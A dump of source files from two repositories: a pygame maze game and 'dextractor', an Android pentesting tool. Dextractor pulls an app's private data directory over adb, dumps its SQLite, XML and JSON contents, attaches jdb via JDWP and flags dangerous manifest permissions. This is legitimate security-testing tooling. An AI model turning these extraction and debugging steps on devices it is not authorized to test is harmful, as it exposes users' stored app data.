self.screen.blit(\n self.player_image,\n (pg_x * self.settings.size_sprite,\n pg_y * self.settings.size_sprite)\n )\n pygame.display.update()\n\n def load_image(self, name):\n \"\"\"\n The main method to load images for pygame.\n \"\"\"\n fullname = os.path.join(self.data_dir, name)\n image = pygame.image.load(fullname)\n image = image.convert_alpha()\n return image\n\n def update_gatekeeper(self):\n \"\"\"\n Display the gate keeper.\n \"\"\"\n gk_y_pos, gk_x_pos = self.gk_pos\n self.screen.blit(\n self.gk_image,\n (gk_x_pos * 
self.settings.size_sprite,\n gk_y_pos * self.settings.size_sprite)\n )\n pygame.display.update()\n\n def update_item(self):\n \"\"\"\n This will display or not the item providing they were picked up\n or not. It tests the dictionary if the item exists or not.\n \"\"\"\n item_list = list(self.item_obj_position.keys())\n if \"aiguille\" in item_list:\n a_position = Update.position_corrector(self, \"aiguille\")\n Update.display_item(self, a_position, self.aiguille_image, False)\n elif \"aiguille\" not in item_list:\n Update.display_item(self,\n self.picked_position[0],\n self.aiguille_image, True)\n\n if \"ether\" in item_list:\n a_position = Update.position_corrector(self, \"ether\")\n Update.display_item(self, a_position, self.ether_image, False)\n elif \"ether\" not in item_list:\n Update.display_item(self,\n self.picked_position[1],\n self.ether_image, True)\n\n if \"seringue\" in item_list:\n a_position = Update.position_corrector(self, \"seringue\")\n Update.display_item(self, a_position, self.seringue_image, False)\n elif \"seringue\" not in item_list:\n Update.display_item(self,\n self.picked_position[2],\n self.seringue_image, True)\n\n def display_item(self, position, item_name=None, picked=False):\n \"\"\"\n Args:\n position (tuple): the position of the item.\n item (obj): the attributes pygame image.\n picked (bool): False if not picked, True if picked up by\n the player.\n \"\"\"\n if not picked:\n self.screen.blit(item_name, position)\n else:\n self.screen.blit(item_name, position)\n\n def position_corrector(self, item):\n \"\"\"\n The method will adjust the position to fit pygame standards.\n Returns:\n tuple: x and y position corrected\n \"\"\"\n position = self.item_obj_position[item]\n position_y, position_x = position\n position_y = position_y * self.settings.size_sprite\n position_x = position_x * self.settings.size_sprite\n return (position_x, position_y)\n\n def ending_display(self):\n \"\"\"\n This will display the ending, victory or fail.\n Returns:\n Bool: True when the player has not met the gatekeeper\n False when he meets him\n \"\"\"\n if self.player.victory_condition is None:\n return True\n elif self.player.victory_condition:\n self.screen.blit(self.victory_image, (0, 0))\n pygame.display.update()\n return False\n else:\n self.screen.blit(self.fail_image, (0, 0))\n pygame.display.update()\n return False\n" }, { "alpha_fraction": 0.5680860877037048, "alphanum_fraction": 0.569021999835968, "avg_line_length": 37.16071319580078, "blob_id": "54989cbdebdf8c1f5e6dc9a2011bbbc556f11f94", "content_id": "3a06e7ae311bc2470cbc032aa7f7c60dcf7b0966", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2137, "license_type": "permissive", "max_line_length": 73, "num_lines": 56, "path": "/models/item.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"This is the Item class it does everything related to it.\n\"\"\"\nimport random\nimport copy\n\n\nclass Item:\n \"\"\"\n The Item object.\n \"\"\"\n\n def __init__(self, level):\n \"\"\"\n Args:\n level (object): to retrieve coordinates.\n\n Attributes:\n level (obj): store the level instance.\n _paths_possibles (list): list of the path possible to\n walk onto.\n finish_position (list): list of one tuple with finish\n coordinate.\n items_coordinate (list): list of the coordinate of\n each item.\n item_obj_position (dict): the name of the object is\n linked to a position.\n \"\"\"\n self.level = level\n self.start_position = 
self.level.player_position\n self.path_possibles = self.level.path_possibles\n self.finish_position = self.level.get_finish_position\n self.items_coordinate = []\n self.item_obj_position = {\"aiguille\": None, \"ether\": None,\n \"seringue\": None,\n }\n self.place_item()\n\n def place_item(self):\n \"\"\"\n Place randomly the items on walkable path and modify every\n attributes related with the new positions.\n\n \"\"\"\n path_possibles_for_item = copy.deepcopy(self.path_possibles)\n # We need to remove the gatekeeper position or an item can appear\n # at the same place\n path_possibles_for_item.remove(self.finish_position)\n path_possibles_for_item.remove(self.start_position)\n self.items_coordinate = random.sample(path_possibles_for_item, 3)\n b = copy.deepcopy(self.items_coordinate)\n # Link the item name with its position in a dictionary\n for key in self.item_obj_position.keys():\n self.item_obj_position[key] = b.pop(0)\n # Updating the values into level object\n self.level.set_items_position(self.items_coordinate)\n self.level.set_item_obj_position(self.item_obj_position)\n" }, { "alpha_fraction": 0.5921787619590759, "alphanum_fraction": 0.5921787619590759, "avg_line_length": 25.850000381469727, "blob_id": "736dd8fbac856407823a0b57fbf9cdb2d2b62f0a", "content_id": "bb6912607f6e703b9aa4a1c2d530639e6203fa5f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "permissive", "max_line_length": 70, "num_lines": 20, "path": "/models/gatekeeper.py", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "\"\"\"A character at the end of the maze.\nThe game is over if the player reach him\nwithout all the items\"\"\"\n\n\nclass GateKeeper:\n \"\"\"\n The Gatekeeper class\n \"\"\"\n\n def __init__(self, level):\n \"\"\"\n Args:\n level (obj): the level instance so we can reach its values\n Attributes:\n level (obj): store the instance to access it\n position (list): get the finish position from level object\n \"\"\"\n self.level = level\n self.position = self.level.get_finish_position\n" }, { "alpha_fraction": 0.6723940372467041, "alphanum_fraction": 0.681557834148407, "avg_line_length": 25.059701919555664, "blob_id": "f5e2a67bf7904985710d282c44c7c1cf880bd640", "content_id": "8bafab3bd5a5f0fb3c9e182b3adf946c31a3fa9f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1756, "license_type": "permissive", "max_line_length": 174, "num_lines": 67, "path": "/README.md", "repo_name": "smtr42/P3_maze", "src_encoding": "UTF-8", "text": "<h1 align=\"center\">\n <br>\n\n <br>\n Project 3 - McGyver\n <br>\n</h1>\n\n<h4 align=\"center\">A simple game made with Python as part as an <a href=\"https://openclassrooms.com/en\" target=\"_blank\">OpenClassrooms</a> project.</h4>\n\n\n<p align=\"center\">\n <a href=\"\">\n <img src=\"https://img.shields.io/badge/Python-3.7-green.svg\">\n </a>\n <a href=\"https://opensource.org/licenses/MIT\">\n <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\">\n </a>\n</p>\n\n# P3_maze\n<p align=\"center\">\n <a href=\"#getting-started\">Getting Started</a> •\n <a href=\"#prerequisites\">Prerequisites</a> •\n <a href=\"#built-with\">Built With</a> •\n <a href=\"#authors\">Authors</a> •\n <a href=\"#license\">License</a> •\n <a href=\"#acknowledgments\">acknowledgments</a>\n</p>\n\nThis is a game made in Python as part of a futur diploma as a Python developer from the 
[OpenClassrooms](https://openclassrooms.com/en) company. I put it here for evaluation.\n\nI tried to :\n* Use the MVC Convention\n* Follow the pep8 recommendation\n* Use OOP\n\n## Getting Started\n\nRead the instructions.txt. It was made so it can runs on any machine. It's part of the requirement.\n\nYou can modify the map.txt, and make your own maze by editing it. This type of file is easier to modify hence the choice.\n\n### Prerequisites\n\nThis uses \n```\npygame==1.9.4\n```\n\n## Built With\n\n* [Python](https://www.python.org/) - The language used\n* [PyGame](https://www.pygame.org) - Dependency\n\n## Authors\n\n* **Simonnet T** - *Initial work* - [smtr42](https://github.com/smtr42)\n\n## License\n\nThis project is licensed under the [MIT](https://choosealicense.com/licenses/mit/) License - see the [LICENSE.md](LICENSE.md) file for details\n\n\n## Acknowledgments\n\n* Thanks to my mentor [Thierry Chappuis](https://github.com/tchappui)\n" } ]
10
AndyCyberSec/dextractor
https://github.com/AndyCyberSec/dextractor
00e656822e5ac069d7f4f32eedb3961cd6aecbbe
f6873bed166488f92de89095e91eef2c00c771fa
d9c021833d547a904b72efda1213ddefdd8e06f1
refs/heads/master
2022-09-10T00:34:18.270834
2020-05-29T16:29:54
2020-05-29T16:29:54
266,062,116
3
1
null
null
null
null
null
[ { "alpha_fraction": 0.4920564889907837, "alphanum_fraction": 0.49470433592796326, "avg_line_length": 26.962963104248047, "blob_id": "09484c4b3647ae8ec22ece74e87d0c266fe83b0c", "content_id": "314e52e38ef903009acc9cddceb99b8ea72b0995", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2266, "license_type": "permissive", "max_line_length": 86, "num_lines": 81, "path": "/dumper.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "import os\nimport filetype\nimport sqlite3\nfrom prettytable import PrettyTable\nimport json\n\ndef dump(files, ftype, dest):\n\n fname = '{}/dump_{}.txt'.format(dest,ftype)\n f = open(fname, 'w')\n\n for file in files:\n kind = filetype.guess(file)\n if 'xml' in ftype:\n if '.xml' in file:\n with open(file, 'r') as fxml:\n xml = fxml.read()\n f.write(\"[+] Dump of %s \\n\\n\" %file)\n f.write(xml)\n f.write(\"\\n\\n\\n\")\n elif 'sqlite' in ftype:\n try:\n if kind.mime == 'application/x-sqlite3':\n db_data = dump_db(file)\n f.write(\"[+] Dump of %s \\n\" %file)\n for k, val in db_data.items():\n f.write(\"[+] Table %s \\n\\n\" % k)\n f.write(val)\n f.write(\"\\n\\n\\n\")\n\n except AttributeError:\n pass\n elif '.json' in file:\n with open(file, 'r') as fjson:\n f.write(\"[+] Dump of %s \\n\" %file)\n j = json.load(fjson)\n json.dump(j, f, indent=4, sort_keys=True)\n f.write(\"\\n\\n\\n\")\n\n \"\"\"try: \n fxml.close()\n fjson.close()\n except UnboundLocalError:\n pass\"\"\"\n \n print(\"[+] Content of the files dumped correctly in %s\" % fname)\n f.close()\n \n\n\ndef fast_scandir(dirname):\n filelist = []\n for path, subdirs, files in os.walk(dirname):\n for name in files:\n filelist.append(os.path.join(path, name))\n return filelist\n\ndef dump_db(file):\n\n data = {}\n\n conn = sqlite3.connect(file)\n conn.text_factory = str\n cur = conn.cursor()\n\n res = cur.execute(\"SELECT name FROM sqlite_master WHERE type='table';\").fetchall()\n table_names = sorted(list(zip(*res))[0])\n\n for table_name in table_names:\n table = PrettyTable()\n res = cur.execute(\"PRAGMA table_info('%s')\" % table_name).fetchall()\n table.field_names = list(zip(*res))[1]\n\n res = cur.execute(\"SELECT * FROM %s;\" % table_name).fetchall()\n\n for row in res:\n table.add_row(row)\n\n data[table_name] = table.get_string()\n\n return data\n\n" }, { "alpha_fraction": 0.5366693735122681, "alphanum_fraction": 0.544165313243866, "avg_line_length": 27.367816925048828, "blob_id": "b499d0ee48fe69861e25d0da273216eff089fd38", "content_id": "5ab04ed44d000f7a369f8c26f716fca67c3b1255", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4936, "license_type": "permissive", "max_line_length": 115, "num_lines": 174, "path": "/main.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom cmd import Cmd\nimport dextractor\nfrom ppadb.client import Client as AdbClient\nimport subprocess\nimport os\nimport dumper\nimport debugger\nimport permissions\n\n \nclass Dextractor(Cmd):\n prompt = 'dextractor % '\n intro = \"\\n64 65 78 74 72 61 63 74 6F 72\"\n intro += \"\\nAndyCyberSec 2020 - www.andreabruschi.net\"\n intro += \"\\nType ? 
or help to list commands\"\n client = AdbClient(host=\"127.0.0.1\", port=5037)\n device = None\n cwd = None\n\n # DOs\n def do_cwd(self, arg):\n self.cwd = arg\n\n # arg is the APK\n def do_dextract(self, arg):\n dextractor.dextract(arg)\n \n # arg is always none\n def do_devices(self, arg=None):\n devices = self.client.devices()\n\n i = len(devices)\n print(\"[+] Found %s devices: \\n\" % (i))\n for device in devices:\n print('[*] %s' % device.serial)\n\n # arg is package and destination folder\n def do_dump(self, arg=None):\n\n try:\n package, dest = parse_arg(arg)\n except ValueError:\n package = parse_arg(arg)\n dest = None\n\n if package:\n if self.device:\n if dest:\n pull(package, dest)\n else:\n if self.cwd:\n pull(package, self.cwd)\n else:\n print(\"[-] Type the path where to save the data or set cwd.\")\n else:\n print(\"[-] Connect to a device first.\") \n else:\n print(\"[-] Package name is needed.\") \n \n def do_connect(self, device=None):\n if device:\n self.device = self.client.device(device)\n print(\"[+] Connected to %s\" % self.device.serial)\n else:\n n_devices = len(self.client.devices())\n if n_devices == 1:\n device = self.client.devices()\n self.device = self.client.device(device[0].serial)\n print(\"[+] Connected to %s\" % self.device.serial) \n\n def do_packages(self, filter=None):\n grep = \"\"\n if filter:\n grep = \"|grep %s\" % filter\n if self.device:\n output = self.device.shell(\"pm list packages %s\" % grep)\n print(output)\n else:\n print(\"[-] Connect to a device first.\")\n\n def do_debug(self, arg=None):\n if self.device:\n output = self.device.shell(\"ps |grep %s\" % arg)\n try:\n pid = output.split(\" \")[4]\n print(output)\n debugger.debug(pid)\n except IndexError:\n print(\"[-] Failed to run debugging. Make sure the app is running and the package name is correct.\")\n \n else:\n print(\"[-] Connect to a device first.\")\n\n def do_perm(self, arg=None):\n permissions.check_permissions(arg)\n\n def do_exit(self, arg):\n print(\"See you soon!\")\n return True\n\n\n\n # HELPs\n def help_cwd(self):\n print(\"Set the current working directory\")\n print(\"cwd /path/to/dir\\n\")\n\n def help_dextract(self):\n print(\"Type: dextract file.apk\")\n\n def help_devices(self):\n print(\"List all devices.\")\n\n def help_dump(self):\n print(\"Dump app data.\")\n print(\"Usage: dump package destination\")\n \n def help_connect(self):\n print(\"Connect to an android device. If only one device is connected, just type connect.\")\n print(\"Usage: connect <devices output>.\")\n\n def help_packages(self):\n print(\"List all the installed apps.\")\n print(\"Usage: packages <name filter>.\")\n\n def help_debug(self):\n print(\"Test debug with jdwp\")\n print(\"Usage: debug com.package.name\")\n\n def help_perm(self):\n print(\"Prints AndroidManifest.xml dangerous permissions\")\n print(\"Usage: perm AndroidManifest.xml\")\n \n def help_exit(self):\n print('exit the application. Shorthand: x q Ctrl-D.')\n \n def default(self, inp):\n if inp == 'x' or inp == 'q':\n return self.do_exit(inp)\n \n print(\"Type ? 
or help to list commands.\")\n \n\n\ndef parse_arg(arg):\n try:\n return tuple(arg.split())\n except ValueError:\n return arg\n\ndef pull(package, dest):\n try:\n # Directory pull to be implemented in ppadb, using standalone binary\n # output = self.device.pull(\"/data/data/%s %s\" % (package, dest))\n try:\n cmd = ['adb', 'pull', \"/data/data/%s\" % package, dest]\n adb = subprocess.Popen(cmd)\n adb.wait()\n except:\n print(\"[-] Error while dumping app data.\")\n\n filelist = dumper.fast_scandir(dest)\n dumper.dump(filelist,'xml',dest)\n dumper.dump(filelist,'sqlite',dest)\n dumper.dump(filelist,'json',dest)\n\n except FileNotFoundError as e:\n print(e)\n \n \nif __name__ == '__main__':\n Dextractor().cmdloop()\n" }, { "alpha_fraction": 0.6898102164268494, "alphanum_fraction": 0.7147852182388306, "avg_line_length": 26.054054260253906, "blob_id": "f2192bfce8a50dc4b6af3ea386beb20406c9b447", "content_id": "b7e8c514d8fdd1ac8cec656b3fcb60e68191cfbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2002, "license_type": "permissive", "max_line_length": 291, "num_lines": 74, "path": "/README.md", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "# dextractor\nAndroid pentesting with ease.\n\n## Description\nThe tools allows to connect through adb to an Android device. Once connected, use the **packages** command to list the installed apps, use **dump** command to save locally the app data files (/data/data/app_package) and dump all xml and sqlite3 content into txt files for further inspection.\nIt allows to connect quickly through jdb and test if anti-debug is in place.\nIt also checks for dangerous permissions in AndroidManifest.xml\n\n```\nandrea@MBP-di-Andrea dextractor % dextractor\n\n64 65 78 74 72 61 63 74 6F 72\nAndyCyberSec 2020 - www.andreabruschi.net\nType ? or help to list commands\ndextractor % perm ./AndroidManifest.xml\n\n[+] Requesting https://developer.android.com/reference/android/Manifest.permission...\n\n[+] Found 4 dangerous permissions in AndroidManifest.xml\n\nDangerous: android.permission.RECORD_AUDIO\n\nDangerous: android.permission.CAMERA\n\nDangerous: android.permission.WRITE_EXTERNAL_STORAGE\n\nDangerous: android.permission.ACCESS_FINE_LOCATION\n```\n\n### Prerequisites\n* dex2jar\n* adb\n\n## Installation\n\n```\npip3 install -r requirements.txt \n```\n\n### Note\nThe tool will use pure-python-adb but actually it doesn't support pull of directories. For this functionality the script now uses adb binary.\n\n## Commands\n```\nDocumented commands (type help <topic>):\n========================================\nconnect cwd debug devices dextract dump exit help packages perm\n```\n\n## Usage\nYou can create a symlink into your /usr/local/bin\n\n```\nln -s /path/dextractor/main.py /usr/local/bin/dextractor\n```\n\n```\n$ dextractor\n\n64 65 78 74 72 61 63 74 6F 72\nAndyCyberSec 2020 - www.andreabruschi.net\nType ? 
or help to list commands\ndextractor % help\n\nDocumented commands (type help <topic>):\n========================================\nconnect cwd debug devices dextract dump exit help packages perm\n\ndextractor % \n```\n\n## Authors\n\n* **Andrea Bruschi** - *Initial work* - [AndyCyberSec](https://github.com/AndyCyberSec)\n" }, { "alpha_fraction": 0.6313337087631226, "alphanum_fraction": 0.6330809593200684, "avg_line_length": 25.384614944458008, "blob_id": "e1a7d5a9a7d277b8e52b0e38352bb40e1e70086e", "content_id": "7fc3b1f0d044e462b4d0f46892537e15a0dbcf19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1717, "license_type": "permissive", "max_line_length": 104, "num_lines": 65, "path": "/permissions.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef compare_permissions(dangerous_permissions, permissions):\n\n result = []\n \n for perm in permissions:\n for att in perm.attrib:\n permission_manifest = perm.attrib[att]\n\n for dangerous_permission in dangerous_permissions:\n\n if dangerous_permission in permission_manifest:\n\n result.append(\"Dangerous:\\t{}\\n\".format(permission_manifest))\n \n return result\n\n\ndef check_permissions(manifest):\n\n try:\n root = ET.parse(manifest).getroot()\n permissions = root.findall(\"uses-permission\")\n dangerous_permissions = make_request()\n\n compare_result = compare_permissions(dangerous_permissions, permissions)\n\n print(\"[+] Found {} dangerous permissions in AndroidManifest.xml\\n\".format(len(compare_result)))\n\n for element in compare_result:\n print(element)\n\n except FileNotFoundError:\n print('[-] Manifest file not found.')\n \n \n\ndef make_request():\n\n url = \"https://developer.android.com/reference/android/Manifest.permission\"\n\n print(\"\\n[+] Requesting {}...\\n\".format(url))\n\n res = requests.get(url)\n html = res.text\n\n soup = BeautifulSoup(html,'html.parser')\n\n permissions = []\n\n # perm_filter = ('normal', 'signature', 'dangerous')\n\n for element in soup.find_all('div', {\"data-version-added\" : True}):\n permission = element.h3.get(\"id\")\n\n if \"Protection level:\" in element.p.text:\n prot_level = element.p.text.split(\"level:\")[1]\n\n if \"dangerous\" in prot_level:\n permissions.append(permission)\n \n return permissions\n\n\n" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 20.25, "blob_id": "43397d678ea277e509b5d2395068391d330d842b", "content_id": "443bedb7364ca277b9d6392918453285e01ce511", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 255, "license_type": "permissive", "max_line_length": 63, "num_lines": 12, "path": "/debugger.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "import subprocess\n\n\ndef debug(pid):\n\n cmd = ['adb', \"forward\", \"tcp:1234\", \"jdwp:{}\".format(pid)]\n stream = subprocess.Popen(cmd)\n stream.wait()\n\n jdb = [\"jdb\", \"-attach\", \"localhost:1234\"]\n stream = subprocess.Popen(jdb)\n stream.wait()\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 17.33333396911621, "blob_id": "f4fd7195b9f0da2e23b42218f1bfac736e673a9c", "content_id": "2b339bc936d63fe4f018351c93121dc0f6271d29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 54, 
"license_type": "permissive", "max_line_length": 26, "num_lines": 3, "path": "/requirements.txt", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "pure-python-adb=0.2.5.dev0\nfiletype=1.0.7\nPTable=0.9.2" }, { "alpha_fraction": 0.5299281477928162, "alphanum_fraction": 0.535514771938324, "avg_line_length": 26.2391300201416, "blob_id": "29f926a6cf39b7e4e4ba18f8e51d074a3ef78d63", "content_id": "b17301545e86c85375eec0f2ba94a659f45f2f1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1253, "license_type": "permissive", "max_line_length": 85, "num_lines": 46, "path": "/dextractor.py", "repo_name": "AndyCyberSec/dextractor", "src_encoding": "UTF-8", "text": "#AndyCyberSec 2020 - https://github.com/AndyCyberSec\n\nfrom zipfile import ZipFile\nimport sys\nimport os\nimport subprocess\n\ndef banner():\n\n print(\"\"\"Usage: dextractor.py file.apk\"\"\")\n\ndef dextract(apk):\n\n dest_path = os.path.dirname(apk)\n\n if len(dest_path) == 0:\n dest_path = \".\"\n\n dexs = []\n file_found = False\n\n try:\n with ZipFile(apk, 'r') as zip:\n for element in zip.infolist():\n if \".dex\" in element.filename:\n try:\n zip.extract(element, dest_path)\n print(\"[+] Extraction of \" + element.filename + \" complete!\")\n dexs.append(dest_path + \"/\" + element.filename) \n file_found = True\n except:\n print(\"[-] Error during extraction of \" + element.filename)\n except FileNotFoundError:\n print(\"[-] %s not found :\\'( \\n\" % apk)\n \n if file_found:\n dextojar(dexs, dest_path)\n\ndef dextojar(dexs, dest_path):\n\n print(\"[+] Now decompiling dex files...\\n\")\n\n cmd = ['/usr/local/bin/d2j-dex2jar', \",\".join(dexs)]\n stream = subprocess.Popen(cmd, cwd=dest_path)\n stream.wait()\n print(\"[+] Decompiling complete!\\n\")\n" } ]
7